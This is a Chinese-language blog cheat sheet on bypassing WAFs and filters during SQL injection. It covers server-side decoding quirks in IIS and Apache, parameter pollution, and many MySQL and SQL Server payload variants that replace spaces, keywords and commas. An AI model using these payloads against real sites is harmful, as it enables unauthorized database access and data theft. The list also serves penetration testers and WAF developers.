1、SQL注入过程中的处理#

  终端payload编码------>web服务器解码-------->CGI脚本解码------>web应用解码----->数据库解码

浏览器、代理等

  ISS/Apache/Tomcat

  php/java/asp.net

  xxx系统

  mysql/sqlserver

  硬件waf

  软件waf

2、bypass方法#

 2.1 服务器层面bypass#

  2.1.1 IIS+ASP、URL处理#

  %符号的处理:会自动去掉特殊符号%,例如输入se%lect,解析出select。

  unicode处理:%u,会自动解码,例如s%u006c%u0006ect

  2.1.2 Apache#

  有的版本允许畸形请求存在,例如GET可替换为任意word,例如"DOTA"  

  2.1.3 HPP方式#

  id=1&id=2&id=3

  Asp.net + iis:   id=1,2,3

  php + apache: id = 3

 2.2 数据库层面bypass#

  1 union select a,b from where and 1 2 3 4 5 6 7 8 9

  2.2.1 mysql数据库#

  位置1的替换

  1、(\N)   --->      id=\Nunion select

  2、浮点数直接连接 -------->       id=1.1union select

  3、(nen) n为整数   --------->     1e2union select

4、单/双引号(如需要单/双引号闭合,则无需空格)

  5、左括号: ----------> union (select xx)

  6、注释:任意/**/注释   ------------------> 1/*here*/union select xx

  7、特殊注释:其中的数字和版本有关,一般大于10000都行。 ----->  id=1/*!50000union*/select

  

  位置2的替换#

  位置3的替换#

  1、空格替换:有如下字符可替代空格

  %09, %0a, %0b, %0c, %0d, %a0

  2、注释:任意/**/注释,例如  ---->   union/*here*/select xx

  3、左括号:       ------>           1 union (select xx)

  位置4的替换#

  位置5的替换#

  1、空格替换:有如下字符可替代空格

  %09, %0a, %0b, %0c, %0d, %a0

  2、左括号: ------>   1 union select (1), xx

  3、运算符

  加减号:   1 union select+1,xx1 union select-1,xx

  ~符号:     1 union select~1, xx

  !符号:      1 union select!1,xx

  @``@^符号:(at后面是反引号): 1 union select@`1`, xx1 union select@^1, xx

  注释:任意/**/注释:  1/*here*/union select xx

  特殊注释: 1 union/*!50000select*/1, xx

  反引号:   1 union select `user`, xx

  单/双引号:  1 union select"1", xx

  {}大括号:    1 union select{x 1}, xx

  \N符号:      1 union select\N, xx

  位置6替换#(同位置5替换)

  位置7替换#(参考位置5,无算数运算符)

 其他#

  1、字符串截取函数

  Mid(version(), 1,1)

  Substr(version(),1,1)

  Substring(version(),1,1)

  Lpad(version(),1)

  Rpad(version(),1,1)

  Left(version(),1)

  reverse(right(reverse(version()),1)

  2、字符串连接函数

  concat(version(), '|', user());

  concat_ws('|',1,2,3)

  3、字符转换

  Ascii(1)

  Char(49)

  Hex('a')

  Unhex(61)

  4、/*!50000keyword*/替换

  任何关键字都可以用/*!50000keyword*/替换

sqlserver数据库

空格替换#

空格符可使用以下符号替换:

01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
位置5/6的替换#

1、:号

1 union select:top 1 from
位置7的替换:#

1、.号

1 union select xx from.table

2、:号

1 union select xx from:table
and后的替换:#

1、:号

1 and:xx

2、%2b号

1 and%2bxx
其他#

1、字符串截取函数

Substring(@@version,1,1)Left(@@version,1)Right(@@version,1)

2、字符串转换函数

Ascii(‘a’) 这里的函数可以在括号之间添加空格的,一些waf过滤不严会导致bypassChar(‘97’)

 

当存在sql注入的情况,但是过滤了“,”,利用UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b实际上也就相当于UNION SELECT 1,2

SQL注入绕过技巧总结的更多相关文章

  1. SQL注入绕过技巧

    1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: % % %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注 ...

  2. SQL Injection绕过技巧

    0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量. 但是更深层次的原因是,将用户输入的字符串,当成了 "sql语 ...

  3. SQL注入绕过的技巧总结

    sql注入在很早很早以前是很常见的一个漏洞.后来随着安全水平的提高,sql注入已经很少能够看到了.但是就在今天,还有很多网站带着sql注入漏洞在运行.稍微有点安全意识的朋友就应该懂得要做一下sql注入 ...

  4. 深入理解SQL注入绕过WAF和过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  5. 深入了解SQL注入绕过waf和过滤机制

    知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...

  6. 深入理解SQL注入绕过WAF与过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  7. TSRC挑战赛:WAF之SQL注入绕过挑战实录

    转自腾讯 博文作者:TSRC白帽子 发布日期:2014-09-03 阅读次数:1338 博文内容: 博文作者:lol [TSRC 白帽子] 第二作者:Conqu3r.花开若相惜 来自团队:[Pax.M ...

  8. 五十:代码审计-PHP无框架项目SQL注入挖掘技巧

    代码审计教学计划: 审计项目漏洞Demo->审计思路->完整源码框架->验证并利用漏洞 代码审计教学内容: PHP,JAVA网站应用,引入框架类开发源码,相关审计工具及插件使用 代码 ...

  9. SQL注入绕过waf的一万种姿势

      绕过waf分类: 白盒绕过: 针对代码审计,有的waf采用代码的方式,编写过滤函数,如下blacklist()函数所示: 1 ........ 2 3 $id=$_GET['id']; 4 5 $ ...

随机推荐

  1. Python爬虫 selenium

    库的安装 pip3 install selenium 声明浏览器对象 from selenium import webdriver browser = webdriver.Chrome() brows ...

  2. [LeetCode] 12,13 整数和罗马数互转

    12. 整数转罗马数字 题目链接:https://leetcode-cn.com/problems/integer-to-roman/ 题目描述: 罗马数字包含以下七种字符: I, V, X, L,C ...

  3. ELK原理与简介

    为什么用到ELK: 一般我们需要进行日志分析场景:直接在日志文件中 grep.awk 就可以获得自己想要的信息.但在规模较大的场景中,此方法效率低下,面临问题包括日志量太大如何归档.文本搜索太慢怎么办 ...

  4. root用户无法访问Mysql数据库问题的解决

    在使用Centos系统远程访问Mysql数据库的时候,系统提示报如下错误: Access Denied for User 'root'@'localhost' (using password: YES ...

  5. es6可变参数-扩展运算符

    es5中参数不确定个数的情况下: //求参数和 function f(){ var a = Array.prototype.slice.call(arguments); var sum = 0; a. ...

  6. Kubernetes的本质

    在前面的四篇文章中,我以 Docker 项目为例,一步步剖析了 Linux 容器的具体实现方式.通过这 些讲解你应该能够明白:一个“容器”,实际上是一个由 Linux Namespace.Linux ...

  7. vue中使用Base64和md5和rsa

    https://blog.csdn.net/benben513624/article/details/88113459(copy) https://www.cnblogs.com/myfate/p/1 ...

  8. Linux(Ubuntu)使用日记------vim复制内容到其他应用

    1.用vim 打开一个文件,然后执行命令:reg 查看是否有 + 或者 × 号  或者执行:version 命令 查看是否有+clipboard 2.如果存在跳过此步骤.如果不存在:在终端输入 sud ...

  9. centos7之zabbix3.2的fping监控

    zabbix通过fping检测主机网络状态 fping的官方网站:http://www.fping.org/ 官网指定的github的地址:https://github.com/schweikert/ ...

  10. tornado自定义session

    这开始之前我们先了解以下什么是cookie和session 简单的说: cookie是保存在客户端的键值对 session是保存在服务端的键值对 session依赖与cookie 在Django中,可 ...